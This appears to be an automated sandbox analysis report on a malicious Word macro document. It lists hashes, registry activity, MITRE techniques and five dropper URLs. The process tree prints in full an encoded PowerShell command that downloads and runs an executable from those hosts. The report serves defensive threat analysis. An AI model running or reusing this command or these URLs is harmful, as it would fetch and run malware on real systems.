ae9a7b94c9c8ace70360f1bce28f468b7ce09ac955332425db6cb560ff65f94f

Analysis

max time kernel
118s
max time network
118s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
09-09-2024 09:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d61469ebe99cbb39b90088f854119971_JaffaCakes118.doc
Size

261KB
MD5

d61469ebe99cbb39b90088f854119971
SHA1

34b41c33c1a8517d926d33db8f919bc93c7bb16f
SHA256

ae9a7b94c9c8ace70360f1bce28f468b7ce09ac955332425db6cb560ff65f94f
SHA512

c46168bb4e8a1a28bb7820fec300ac69d88aee279e2644dbba8beaf5793d99b7c22ceacaa6692c3f5ce290389205622e1ced4f77b57b83489bb7a2eb47a2b81f
SSDEEP

3072:5OzPM83524CCyCyMmq5YZF8yDtAKPzjL/xSu90OoiLuDKZXfwKeljR1k:sb25CFk8stRbxUOmD+XfwLg

Score

10^/10

discovery

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://localfreelancersng.com/JJ5na9IyL

exe.dropper

http://pobedastaff.ru/6iYWKl5I_MG

exe.dropper

http://wellbeinghomecareservices.co.uk/A9Y90usX88aRT

exe.dropper

http://vkckd.kultkam.ru/QUxQZUG_9i

exe.dropper

http://beautyandbrainsmagazine.site/cfmGNuDVbnc50bks

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1528	1952	PoWersheLL.exe	29

Blocklisted process makes network request 2 IoCs

flow	pid	Process
6	1528	PoWersheLL.exe
8	1528	PoWersheLL.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoWersheLL.exe

Office loads VBA resources, possible macro or embedded object present

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{446FB43A-F420-45E9-838B-064F5308D363}\2.0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{446FB43A-F420-45E9-838B-064F5308D363}\2.0\FLAGS	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{446FB43A-F420-45E9-838B-064F5308D363}\2.0\0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\TypeLib\{446FB43A-F420-45E9-838B-064F5308D363}\2.0\FLAGS	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\TypeLib\{446FB43A-F420-45E9-838B-064F5308D363}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1952	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1528	PoWersheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1528	PoWersheLL.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1952	WINWORD.EXE
1952	WINWORD.EXE

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1952 wrote to memory of 1528	1952	WINWORD.EXE	30
PID 1952 wrote to memory of 1528	1952	WINWORD.EXE	30
PID 1952 wrote to memory of 1528	1952	WINWORD.EXE	30
PID 1952 wrote to memory of 1528	1952	WINWORD.EXE	30
PID 1952 wrote to memory of 1596	1952	WINWORD.EXE	33
PID 1952 wrote to memory of 1596	1952	WINWORD.EXE	33
PID 1952 wrote to memory of 1596	1952	WINWORD.EXE	33
PID 1952 wrote to memory of 1596	1952	WINWORD.EXE	33

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d61469ebe99cbb39b90088f854119971_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1952
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PoWersheLL.exe
  PoWersheLL -e JABrAGkAbQA0AHEAegBpAHcAPQAoACcAUwB3AFQARQA2AEUAJwArACcAbAAnACkAOwAkAHoAawBtAEsAaQBXAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAOQBCADIAUwB0AD0AKAAnAGgAdAB0AHAAOgAvAC8AJwArACcAbABvACcAKwAnAGMAYQBsAGYAJwArACcAcgBlAGUAJwArACcAbABhAG4AYwAnACsAJwBlAHIAJwArACcAcwBuAGcALgBjACcAKwAnAG8AbQAvAEoASgA1AG4AYQA5ACcAKwAnAEkAeQBMAEAAJwArACcAaAAnACsAJwB0AHQAcAA6AC8AJwArACcALwBwAG8AYgAnACsAJwBlACcAKwAnAGQAJwArACcAYQBzAHQAYQAnACsAJwBmACcAKwAnAGYALgByAHUALwA2AGkAWQAnACsAJwBXAEsAJwArACcAbAA1AEkAXwBNACcAKwAnAEcAQAAnACsAJwBoAHQAJwArACcAdAAnACsAJwBwADoALwAnACsAJwAvAHcAZQAnACsAJwBsAGwAYgBlAGkAJwArACcAbgAnACsAJwBnAGgAJwArACcAbwAnACsAJwBtAGUAYwBhAHIAZQBzAGUAcgB2AGkAYwBlAHMAJwArACcALgBjAG8ALgAnACsAJwB1ACcAKwAnAGsALwBBACcAKwAnADkAJwArACcAWQA5ADAAJwArACcAdQBzACcAKwAnAFgAOAAnACsAJwA4AGEAJwArACcAUgBUACcAKwAnAEAAaAB0AHQAcAA6AC8ALwB2AGsAJwArACcAYwBrAGQAJwArACcALgBrAHUAJwArACcAbAB0AGsAYQBtAC4AcgB1ACcAKwAnAC8AUQBVACcAKwAnAHgAUQBaAFUARwBfADkAaQBAACcAKwAnAGgAdAB0ACcAKwAnAHAAOgAvACcAKwAnAC8AYgBlAGEAJwArACcAdQB0AHkAYQAnACsAJwBuAGQAJwArACcAYgAnACsAJwByAGEAaQBuAHMAJwArACcAbQAnACsAJwBhAGcAJwArACcAYQB6AGkAbgBlAC4AcwBpAHQAJwArACcAZQAnACsAJwAvAGMAZgBtAEcATgAnACsAJwB1ACcAKwAnAEQAVgBiAG4AYwAnACsAJwA1ADAAYgBrAHMAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAbwBUAGoAdwA1AG8APQAoACcAVABIACcAKwAnADkAegBVAEoAWAAnACkAOwAkAHcAOABYAFEASwBKADkAIAA9ACAAKAAnADMAJwArACcANgAwACcAKQA7ACQARwBhAGMARgBDAG0ASwByAD0AKAAnAHQAYwBMACcAKwAnAGoARwBzACcAKwAnAE0AJwApADsAJABHAFMAawB6AGkAdAA9ACQAZQBuAHYAOgB0AGUAbQBwACsAJwBcACcAKwAkAHcAOABYAFEASwBKADkAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJAB6AFQASQBFAEMARQAgAGkAbgAgACQAYQA5AEIAMgBTAHQAKQB7AHQAcgB5AHsAJAB6AGsAbQBLAGkAVwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB6AFQASQBFAEMARQAsACAAJABHAFMAawB6AGkAdAApADsAJABuAHIAUAB6AGkASAA9ACgAJwBvAEIAJwArACcAcAA3ACcAKwAnAHMAWQBMAGQAJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQARwBTAGsAegBpAHQAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABHAFMAawB6AGkAdAA7ACQAagBRADcAbQBNAEcAUABjAD0AKAAnAFYAcQBsADcAQQAnACsAJwBPAHUAJwArACcATAAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAegA4AFgAcwBYAHEAMwA9ACgAJwBDADAAJwArACcARgAnACsAJwBpADYAagAnACkAOwA=
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1528
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
d4a12eaa5b52504f9586576e406c8400

SHA1
4f5af2fa6c1b17b05ad1805c4136ad75595d8893

SHA256
403665e88547db8f8e5114a9a682d11358d18271438ffe8080a5e735a95f2b52

SHA512
613992a63e0ceb2be14801773108e6bdfbf4a8cd9caa00e55564efcfa8189aebad20c80f459e8136e718505651eb5be208797ef1a1db3859f24fadb3e8494ff5

Download Submit
memory/1952-21-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-158-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-12-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-8-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-9-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-18-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-32-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-19-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-17-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-16-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-15-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-14-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-13-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-11-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-181-0x0000000070EFD000-0x0000000070F08000-memory.dmp

Filesize
44KB

Download
memory/1952-2-0x0000000070EFD000-0x0000000070F08000-memory.dmp

Filesize
44KB

Download
memory/1952-20-0x0000000006AB0000-0x0000000006BB0000-memory.dmp

Filesize
1024KB

Download
memory/1952-51-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-67-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-77-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-68-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-103-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-89-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-44-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-37-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-151-0x0000000070EFD000-0x0000000070F08000-memory.dmp

Filesize
44KB

Download
memory/1952-152-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-156-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-157-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download
memory/1952-0-0x000000002F8A1000-0x000000002F8A2000-memory.dmp

Filesize
4KB

Download
memory/1952-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1952-10-0x0000000000850000-0x0000000000950000-memory.dmp

Filesize
1024KB

Download